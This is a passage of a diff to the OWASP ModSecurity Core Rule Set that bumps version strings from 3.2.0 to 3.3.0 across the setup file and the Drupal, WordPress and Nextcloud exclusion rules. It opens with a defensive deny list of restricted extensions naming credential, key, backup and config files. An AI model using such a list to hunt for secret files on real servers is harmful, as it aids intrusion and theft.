ver:'OWASP_CRS/3.3.0',\ setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" # Default HTTP policy: restricted_headers (rule 900250) @@ -217,7 +217,7 @@ SecRule &TX:restricted_headers "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.restricted_headers=/proxy/ /lock-token/ /content-range/ /if/'" # Default HTTP policy: static_extensions (rule 900260) @@ -226,7 +226,7 @@ SecRule &TX:static_extensions "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" # Default enforcing of body processor URLENCODED @@ -235,7 +235,7 @@ SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.enforce_bodyproc_urlencoded=0'" # @@ -253,7 +253,7 @@ SecAction \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.anomaly_score=0',\ setvar:'tx.anomaly_score_pl1=0',\ setvar:'tx.anomaly_score_pl2=0',\ @@ -290,7 +290,7 @@ SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \ pass,\ t:none,t:sha1,t:hexEncode,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.ua_hash=%{MATCHED_VAR}'" SecAction \ @@ -299,7 +299,7 @@ SecAction \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ initcol:global=global,\ initcol:ip=%{remote_addr}_%{tx.ua_hash},\ setvar:'tx.real_ip=%{remote_addr}'" @@ -320,7 +320,7 @@ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ msg:'Enabling body inspection',\ tag:'paranoia-level/1',\ ctl:forceRequestBodyVariable=On,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Force body processor URLENCODED SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ @@ -331,7 +331,7 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ nolog,\ noauditlog,\ msg:'Enabling forced body inspection for ASCII content',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ "ctl:requestBodyProcessor=URLENCODED" @@ -370,7 +370,7 @@ SecRule TX:sampling_percentage "@eq 100" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-SAMPLING" SecRule UNIQUE_ID "@rx ^." \ @@ -379,7 +379,7 @@ SecRule UNIQUE_ID "@rx ^." \ pass,\ t:sha1,t:hexEncode,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'TX.sampling_rnd100=%{MATCHED_VAR}'" SecRule DURATION "@rx (..)$" \ @@ -388,7 +388,7 @@ SecRule DURATION "@rx (..)$" \ pass,\ capture,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'TX.sampling_rnd100=%{TX.sampling_rnd100}%{TX.1}'" SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ @@ -397,7 +397,7 @@ SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ pass,\ capture,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'" SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \ @@ -406,7 +406,7 @@ SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \ pass,\ capture,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'TX.sampling_rnd100=%{TX.1}'" @@ -429,10 +429,9 @@ SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ pass,\ log,\ noauditlog,\ - msg:'Sampling: Disable the rule engine based on sampling_percentage \ -%{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ + msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ ctl:ruleEngine=Off,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecMarker "END-SAMPLING" @@ -450,4 +449,4 @@ SecRule TX:executing_paranoia_level "@lt %{tx.paranoia_level}" \ t:none,\ log,\ msg:'Executing paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" diff --git a/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf b/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf index 8e5c8c58f..2b6b1a77e 100644 --- a/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -68,7 +68,7 @@ SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DRUPAL-RULE-EXCLUSIONS" @@ -106,7 +106,7 @@ SecAction "id:9001100,\ nolog,\ ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES_NAMES,\ ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -121,7 +121,7 @@ SecRule REQUEST_FILENAME "@endsWith /core/install.php" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass2],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /user/login" \ "id:9001112,\ @@ -130,7 +130,7 @@ SecRule REQUEST_FILENAME "@endsWith /user/login" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \ "id:9001114,\ @@ -139,7 +139,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \ "id:9001116,\ @@ -149,7 +149,7 @@ SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:current_pass,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -169,7 +169,7 @@ SecRule REQUEST_FILENAME "@contains /admin/config/" \ pass,\ nolog,\ ctl:ruleRemoveById=942430,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \ "id:9001124,\ @@ -186,7 +186,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_activated_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_blocked_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_canceled_body,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/single/import" \ "id:9001126,\ @@ -195,7 +195,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/sing nolog,\ ctl:ruleRemoveById=920271,\ ctl:ruleRemoveById=942440,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ "id:9001128,\ @@ -203,7 +203,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ pass,\ nolog,\ ctl:ruleRemoveById=942440,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -220,7 +220,7 @@ SecRule REQUEST_FILENAME "@endsWith /contextual/render" \ pass,\ nolog,\ ctl:ruleRemoveTargetById=942130;ARGS:ids[],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -239,7 +239,7 @@ SecAction "id:9001160,\ ctl:ruleRemoveTargetById=942440;ARGS:form_build_id,\ ctl:ruleRemoveTargetById=942450;ARGS:form_token,\ ctl:ruleRemoveTargetById=942450;ARGS:form_build_id,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -256,7 +256,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/content/formats/manage/full_ht nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:editor[settings][toolbar][button_groups],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filters[filter_html][settings][allowed_html],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -274,7 +274,7 @@ SecRule REQUEST_METHOD "@streq POST" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@rx /admin/content/assets/add/[a-z]+$" \ "chain" @@ -288,7 +288,7 @@ SecRule REQUEST_METHOD "@streq POST" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@rx /admin/content/assets/manage/[0-9]+$" \ "chain" @@ -306,7 +306,7 @@ SecRule REQUEST_METHOD "@streq POST" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@rx /file/ajax/field_asset_[a-z0-9_]+/[ua]nd/0/form-[a-z0-9A-Z_-]+$" \ "chain" @@ -334,7 +334,7 @@ SecRule REQUEST_FILENAME "@endsWith /node/add/article" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /node/add/page" \ "id:9001202,\ @@ -343,7 +343,7 @@ SecRule REQUEST_FILENAME "@endsWith /node/add/page" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \ "id:9001204,\ @@ -353,7 +353,7 @@ SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ ctl:ruleRemoveTargetById=932110;ARGS:destination,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /block/add" \ "id:9001206,\ @@ -361,7 +361,7 @@ SecRule REQUEST_FILENAME "@endsWith /block/add" \ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/basic" \ "id:9001208,\ @@ -369,7 +369,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:description,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \ "id:9001210,\ @@ -377,7 +377,7 @@ SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:value,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \ "id:9001212,\ @@ -385,7 +385,7 @@ SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message[0][value],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ "id:9001214,\ @@ -393,7 +393,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:maintenance_mode_message,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \ "id:9001216,\ @@ -401,7 +401,7 @@ SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feed_description,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecMarker "END-DRUPAL-RULE-EXCLUSIONS" diff --git a/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf b/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf index 487eef01d..4384266a7 100644 --- a/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -22,7 +22,7 @@ SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-WORDPRESS" SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ @@ -31,7 +31,7 @@ SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-WORDPRESS" @@ -52,7 +52,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Reset password SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ @@ -61,7 +61,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq resetpass" \ "t:none,\ @@ -85,7 +85,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-comments-post.php" \ t:none,\ nolog,\ ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -102,7 +102,7 @@ SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/(?:posts|pages)" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Gutenberg via rest_route for sites without pretty permalinks SecRule REQUEST_FILENAME "@endsWith /index.php" \ @@ -111,7 +111,7 @@ SecRule REQUEST_FILENAME "@endsWith /index.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule &ARGS:rest_route "@eq 1" \ "t:none,\ @@ -140,7 +140,7 @@ SecRule ARGS:wp_customize "@streq on" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule &ARGS:action "@eq 0" \ "t:none,\ @@ -161,7 +161,7 @@ SecRule ARGS:wp_customize "@streq on" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@rx ^(?:|customize_save|update-widget)$" \ "t:none,\ @@ -202,7 +202,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-cron.php" \ nolog,\ ctl:ruleRemoveById=920180,\ ctl:ruleRemoveById=920300,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -217,7 +217,7 @@ SecRule REQUEST_COOKIES:_wp_session "@rx ^[0-9a-f]+\|\|\d+\|\|\d+$" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule &REQUEST_COOKIES:_wp_session "@eq 1" \ "t:none,\ @@ -236,7 +236,7 @@ SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-WORDPRESS-ADMIN" SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ @@ -245,7 +245,7 @@ SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-WORDPRESS-ADMIN" @@ -260,7 +260,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/setup-config.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:step "@streq 2" \ "t:none,\ @@ -276,7 +276,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/install.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:step "@streq 2" \ "t:none,\ @@ -299,7 +299,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/profile.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ @@ -327,7 +327,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-edit.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ @@ -356,7 +356,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-new.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq createuser" \ "t:none,\ @@ -397,7 +397,7 @@ SecAction \ ctl:ruleRemoveTargetById=942200;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=942260;ARGS:wp_http_referer,\ ctl:ruleRemoveTargetById=942431;ARGS:wp_http_referer,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # # [ Content editing ] @@ -414,7 +414,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/post.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@rx ^(?:edit|editpost)$" \ "t:none,\ @@ -434,7 +434,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq heartbeat" \ "t:none,\ @@ -456,7 +456,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/nav-menus.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq update" \ "t:none,\ @@ -481,7 +481,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@rx ^(?:save-widget|update-widget)$" \ "t:none,\ @@ -536,7 +536,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq widgets-order" \ "t:none,\ @@ -565,7 +565,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq sample-permalink" \ "t:none,\ @@ -581,7 +581,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq add-menu-item" \ "t:none,\ @@ -597,7 +597,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq send-attachment-to-editor" \ "t:none,\ @@ -618,7 +618,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:option_page "@streq general" \ "t:none,\ @@ -649,7 +649,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/options-permalink.php" \ ctl:ruleRemoveTargetById=920272;ARGS:permalink_structure,\ ctl:ruleRemoveTargetById=942431;ARGS:permalink_structure,\ ctl:ruleRemoveTargetById=920272;REQUEST_BODY,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Comments blacklist and moderation list SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ @@ -658,7 +658,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:option_page "@streq discussion" \ "t:none,\ @@ -682,7 +682,7 @@ SecRule REQUEST_FILENAME "@endsWith /wp-admin/edit.php" \ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:s,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -721,7 +721,7 @@ SecRule REQUEST_FILENAME "@rx /wp-admin/load-(?:scripts|styles)\.php$" \ ctl:ruleRemoveTargetById=942430;ARGS:load[],\ ctl:ruleRemoveTargetById=942431;ARGS:load[],\ ctl:ruleRemoveTargetById=942432;ARGS:load[],\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecMarker "END-WORDPRESS-ADMIN" diff --git a/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf b/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf index 7bca415f3..340d98a9b 100644 --- a/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -43,7 +43,7 @@ SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-NEXTCLOUD" SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ @@ -52,7 +52,7 @@ SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-NEXTCLOUD" @@ -74,7 +74,7 @@ SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ ctl:ruleRemoveById=953100-953130,\ ctl:ruleRemoveById=920420,\ ctl:ruleRemoveById=920440,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Skip PUT parsing for invalid encoding / protocol violations in binary files. @@ -84,7 +84,7 @@ SecRule REQUEST_METHOD "@streq PUT" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ "t:none,\ @@ -102,7 +102,7 @@ SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" # Allow the data type 'application/octet-stream' @@ -113,7 +113,7 @@ SecRule REQUEST_METHOD "@rx ^(?:PUT|MOVE)$" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@rx /remote\.php/dav/(?:files|uploads)/" \ "setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |application/octet-stream|'" @@ -126,7 +126,7 @@ SecRule REQUEST_METHOD "@streq PUT" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@rx (?:/public\.php/webdav/|/remote\.php/dav/uploads/)" \ "ctl:ruleRemoveById=920340,\ @@ -147,7 +147,7 @@ SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ ctl:ruleRemoveById=951000-951999,\ ctl:ruleRemoveById=953100-953130,\ ctl:ruleRemoveById=920440,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Allow REPORT requests without Content-Type header (at 